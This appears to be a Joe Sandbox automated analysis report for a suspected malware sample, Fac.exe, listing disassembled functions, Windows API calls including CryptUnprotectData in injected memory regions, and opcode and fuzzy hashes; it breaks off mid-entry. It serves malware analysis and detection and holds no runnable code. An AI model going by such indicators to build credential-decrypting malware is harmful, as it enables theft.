Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78

Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77293420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
GlobalFree.KERNEL32(?), ref: 00403900

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8

Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Fac.exe,C:\Users\user\Desktop\Fac.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Fac.exe,C:\Users\user\Desktop\Fac.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB

Strings

C:\Users\user\Desktop, xrefs: 00405BA5

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC

Function 701710E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7017116A
GlobalFree.KERNEL32(00000000), ref: 701711C7
GlobalFree.KERNEL32(00000000), ref: 701711D9
GlobalFree.KERNEL32(?), ref: 70171203

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 18c65d6e6a8402548809976ab4fc7b2b814d5cc3b1dfd1498e8410b6efa612d3
Instruction ID: 81e020a558436b0d002730b730d980ed9041db93442b0b333f4678f1e18fe350
Opcode Fuzzy Hash: 18c65d6e6a8402548809976ab4fc7b2b814d5cc3b1dfd1498e8410b6efa612d3
Instruction Fuzzy Hash: 0C31AEB2500201DFD7018F7DDD45A6D77F8FB45210762A52AFA42DBB24EB74E8808B21

Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

Analysis Process: Fac.exePID: 6840, Parent PID: 7448COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.1%
Total number of Nodes:	172
Total number of Limit Nodes:	13

Executed Functions

Function 001529E0 Relevance: 8.2, Strings: 6, Instructions: 685
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 00152BA4
Xq, xrefs: 00152AD8
Xq, xrefs: 00153CF6
Xq, xrefs: 00152A9E
Xq, xrefs: 00152B57
Xq, xrefs: 00153CCD

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq$Xq$Xq
API String ID: 0-905847027
Opcode ID: c62134b61bfd0890ae827d7304f40e6bc7afea3ec5b07c9cf886ad5924fc7bc6
Instruction ID: d159f90fb53546acb190512421654f2c94883c1676fdca7a5c37d2ddb6b70da9
Opcode Fuzzy Hash: c62134b61bfd0890ae827d7304f40e6bc7afea3ec5b07c9cf886ad5924fc7bc6
Instruction Fuzzy Hash: E8324F6690D7D48FCB638B7448E825B7FB16B82205BC945DFC4C78B687DB28C609C362

Function 00159DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

4'q, xrefs: 00159F0C
4'q, xrefs: 00159E04
4'q, xrefs: 0015AB13
(oq, xrefs: 0015A518

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: 4225bc345771409c300350d267fada528d490552b69f4abf37bba9d7e0745100
Instruction ID: f359783145215492e1c1ec86a0cda7ace1f903b3c150391972206e0aa23b9360
Opcode Fuzzy Hash: 4225bc345771409c300350d267fada528d490552b69f4abf37bba9d7e0745100
Instruction Fuzzy Hash: 5AA27030A40209CFCB15CF68C994AAEBBF2BF88301F558659E815DF261D735ED89CB52

Function 00156FC8 Relevance: 5.5, Strings: 4, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 00157298
(oq, xrefs: 00157212
(oq, xrefs: 00157220
,q, xrefs: 0015728A

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: ec7fa70d29c697a6f96ef7f9c40963c70ed4bf3b1e811a55966f584f72fb32ff
Instruction ID: 80bf751318da3849fcc74c1791751efe1cbee15d622ae4e8577d1491ca74c2c2
Opcode Fuzzy Hash: ec7fa70d29c697a6f96ef7f9c40963c70ed4bf3b1e811a55966f584f72fb32ff
Instruction Fuzzy Hash: DB024F30A08219DFCB15CF68E885AADBBF2FF49311F158069EC25AB2A1D734DD49CB51

Function 001569A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

Hq, xrefs: 00156DA6
(oq, xrefs: 00156EDA

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: a38c49e2295613a3ff5a75a5fc4fdc4dfe9b57559d6ac1b710d027e69e42fd90
Instruction ID: 0f3b09edba6d04f0b8b6b581920e90dae51058b0e4777552c582d07f129f253e
Opcode Fuzzy Hash: a38c49e2295613a3ff5a75a5fc4fdc4dfe9b57559d6ac1b710d027e69e42fd90
Instruction Fuzzy Hash: 7B128E70A00219CFDB14DFA9C854BAEBBB6FF88301F148529E859DB3A5DB309D45CB91

Function 0015BBC8 Relevance: 2.9, Strings: 2, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0015BFF8
PHq, xrefs: 0015BFE7

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 881cfc0b0a080b826245f73109269da1040a6c76a62f86f0a9d32996858c7a13
Instruction ID: 2ff81382ae1d73d506e8b5a3f3a31b5264b217fea15635f87dc62d73f81c6299
Opcode Fuzzy Hash: 881cfc0b0a080b826245f73109269da1040a6c76a62f86f0a9d32996858c7a13
Instruction Fuzzy Hash: B4E10B74E04258CFDB14DFA9C884AADBBB2FF49315F158069E829AB361DB30AC45CF50

Function 00155360 Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

PHq, xrefs: 001555C8
PHq, xrefs: 001555D9

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 2c40c986615bc0deb7fdb8427f383c6118e18e23da4fb2cdd676c736b0f5c8fa
Instruction ID: 8dd5eaf5e3e67d2b07d72647df8f59676d3d0118273b9e6ceac6c0abd4300ede
Opcode Fuzzy Hash: 2c40c986615bc0deb7fdb8427f383c6118e18e23da4fb2cdd676c736b0f5c8fa
Instruction Fuzzy Hash: 9F91D574E00618CFDB14CFA9D894A9DBBF2FF88301F158069E819AB365EB749985CF50

Function 0015C600 Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

PHq, xrefs: 0015C868
PHq, xrefs: 0015C857

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: b911e5e36a5c0abeb112b112ba5eb8c2487a9ebc25a16b9742932196ccfaa5a2
Instruction ID: 6ad11137d4772f2d26a604d2abe5e03a68894b4cabcfb35215eb9672cb3e3aba
Opcode Fuzzy Hash: b911e5e36a5c0abeb112b112ba5eb8c2487a9ebc25a16b9742932196ccfaa5a2
Instruction Fuzzy Hash: 1191C374E00258CFEB14DFA9C884A9DBBF2FF89301F248069E819AB365DB749945CF50

Function 0015C060 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PHq, xrefs: 0015C2C8
PHq, xrefs: 0015C2B7

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: ad55e0860124f6df3d7bd2acd8208c99ed87d572e40970bfd3ef0705e80fa201
Instruction ID: 29efeb3ab24938d9f84a08a621a832fe8c0b1d24fec071c184b326048c33f624
Opcode Fuzzy Hash: ad55e0860124f6df3d7bd2acd8208c99ed87d572e40970bfd3ef0705e80fa201
Instruction Fuzzy Hash: A281C574E00618CFEB14DFAAD884A9DBBF2BF89305F14C069E819AB365DB705945CF50

Function 0015CE70 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PHq, xrefs: 0015D0D8
PHq, xrefs: 0015D0C7

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 6721a19e5b86beca302c310d78a013a13a5ddde9d96eb05fc4f395ad5dc01ac7
Instruction ID: 9a10e17ad4113d1f4c2e064ab225e00a22acdd37e8d71d24cff8e3473e3bd09b
Opcode Fuzzy Hash: 6721a19e5b86beca302c310d78a013a13a5ddde9d96eb05fc4f395ad5dc01ac7
Instruction Fuzzy Hash: F181B574E00218CFEB14DFAAD884A9DBBF2FF89301F148069E819AB365DB755946CF50

Function 0015CBA0 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PHq, xrefs: 0015CDF7
PHq, xrefs: 0015CE08

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 366ea2f3fc46b2b1864cee44209670413c3a8ae727a6956629245a7526f9d996
Instruction ID: 324245c109f3ff1d1a581696081476072f88bbca9166265f2cbcd519de321b99
Opcode Fuzzy Hash: 366ea2f3fc46b2b1864cee44209670413c3a8ae727a6956629245a7526f9d996
Instruction Fuzzy Hash: D681B374E01258DFEB14DFAAC884A9DBBF2BF88301F14C069E819AB365DB749945CF50

Function 0015C330 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHq, xrefs: 0015C598
PHq, xrefs: 0015C587

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: c97a93152cef6a188ae7eef43292e904f106e96f4fd4851262fd94bee7a26c75
Instruction ID: fa81fc18c26806b05f22cb179cf3e475b541d5104ffac42146c6eafd4e47b64e
Opcode Fuzzy Hash: c97a93152cef6a188ae7eef43292e904f106e96f4fd4851262fd94bee7a26c75
Instruction Fuzzy Hash: E881B574E00218CFEB14DFA9D894A9DBBF2BF89301F148069E819AB365EB709945CF50

Function 0015C8D0 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHq, xrefs: 0015CB38
PHq, xrefs: 0015CB27

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 737c4b10ad7267c09a088ec1b8900b9fa9588d5234b9ad3a7db6ba8dad5ea230
Instruction ID: 98db1c26289ae37a8f26a5360e11920efe94914e9f0ca88e567e4260fac33017
Opcode Fuzzy Hash: 737c4b10ad7267c09a088ec1b8900b9fa9588d5234b9ad3a7db6ba8dad5ea230
Instruction Fuzzy Hash: 8181A574E00258CFEB14DFAAD884A9DBBF2BF89301F14C069E819AB365EB745945CF50

Function 36C3D9F0 Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36C3DA5D

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 494f0bedadd3c83c62781a0fd2dc301254434ead1ed80b90c4eb0d0e667eacb2
Instruction ID: 5478174a02bac030d69f7fa4b2bcfe7dbb41758d6a25180f5eb938ee8437d4a4
Opcode Fuzzy Hash: 494f0bedadd3c83c62781a0fd2dc301254434ead1ed80b90c4eb0d0e667eacb2
Instruction Fuzzy Hash: 3A2136B68002499FDB10CF99C944BDEBFB5EF48320F14841AE968A7610C339A951DFA1

Function 36C3D2A8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36C3DA5D

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: e98f82f23f7b401cf232b9c9aad3b4b34fecef0cee822e91f83af78e71fa99e0
Instruction ID: 588beecc91b3d4bcb9a7fe31f940da4585858d3f17614d5eb816bf8ddb049a75
Opcode Fuzzy Hash: e98f82f23f7b401cf232b9c9aad3b4b34fecef0cee822e91f83af78e71fa99e0
Instruction Fuzzy Hash: DD1129B6804349DFDB10CF9AC944BEEBBF5EF48320F148419E514A7601C779A950DFA5

Function 36FDD710 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8015717aed3e1c6a3a45707206c1f59849046648698d11fdc4d98d89692c8c7f
Instruction ID: 5e66bac8ccd893bec0eb7e47526902124b6d95baa44f9a45372c11d7808d2482
Opcode Fuzzy Hash: 8015717aed3e1c6a3a45707206c1f59849046648698d11fdc4d98d89692c8c7f
Instruction Fuzzy Hash: 7D825974E012288FEB64DF69C994BDDBBB2BB89304F1481E9D80DA7265DB305E81CF41

Function 36FDEE38 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a309fa62ca5a37456d424cb6243587d1ffd861e6b3983cbf777ca3269662f4
Instruction ID: 7ca94a904c35c6c4695ec4961ca58797a47252bc892b7f267f23f72a717347d9
Opcode Fuzzy Hash: 16a309fa62ca5a37456d424cb6243587d1ffd861e6b3983cbf777ca3269662f4
Instruction Fuzzy Hash: 16727974E012289FEB64DF69C894BDEBBB2BB89300F1481E9D40DA7265DB315E81CF51

Function 36FBA6E8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4649f948f6b88623c9525220e7ca2af2b0fd117767a0b8c063effedfd730cfc0
Instruction ID: a426e239ef94fbe46c45460f0dfaac726522328628dd6bbd1d76f2fb80c18c85
Opcode Fuzzy Hash: 4649f948f6b88623c9525220e7ca2af2b0fd117767a0b8c063effedfd730cfc0
Instruction Fuzzy Hash: 06E1B074E01218CFEB64DFA5C840B9DBBB2FF89304F2081AAD408AB395DB755A85CF55

Function 37001828 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191895bcc2e1c24e4b6644871bb7ed0d80401b52abaefba86a294dcda296c28a
Instruction ID: 7a5b9112cf3fd1d2d163e0babd28558d08d132359e51e8a4abd19996a1e74d78
Opcode Fuzzy Hash: 191895bcc2e1c24e4b6644871bb7ed0d80401b52abaefba86a294dcda296c28a
Instruction Fuzzy Hash: C9D1A174E013188FDB64DFA5C850B9DBBB2BF89300F2081A9D408AB354DB359E86CF55

Function 36FE61E8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f732b23d214d741cf1b65fc48e1a3525bd0bf98c7382a45e72fe53023bac771
Instruction ID: 0c8582b0d199459f353266d560b012da5d72a26d983e476195c084d4bc19f27f
Opcode Fuzzy Hash: 6f732b23d214d741cf1b65fc48e1a3525bd0bf98c7382a45e72fe53023bac771
Instruction Fuzzy Hash: 1BD19F74E013188FDB64DFA5C890B9DBBB2BF89304F6081A9D408AB354DB359E86CF55

Function 36FBAD40 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d92381dadb4481a8ec67d40f73abc0ec751654d1897c1575b3c6a97c6a62b6e
Instruction ID: 0d0f7615b3f958665de5d5cf6b8773cbc720678609758024e408ce5eff44c53c
Opcode Fuzzy Hash: 7d92381dadb4481a8ec67d40f73abc0ec751654d1897c1575b3c6a97c6a62b6e
Instruction Fuzzy Hash: 91D19F78E012188FEB54DFA5C990B9DBBB2FF89300F2081A9D448AB365DB355D82CF55

Function 36FE2DA8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e107fd545e781c33f53dd48a5551f0bebf5c401fd9ca28aaac85cf335e8feef
Instruction ID: a6c8a37c0a168e3ed1237da6d85b1ed829df1392da6d74a7e24f937bdc971323
Opcode Fuzzy Hash: 4e107fd545e781c33f53dd48a5551f0bebf5c401fd9ca28aaac85cf335e8feef
Instruction Fuzzy Hash: 3AD19F78E012188FDB54DFA5C950B9DBBB2FF89300F2081A9D448AB365DB359D82CF55

Function 36FB52C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

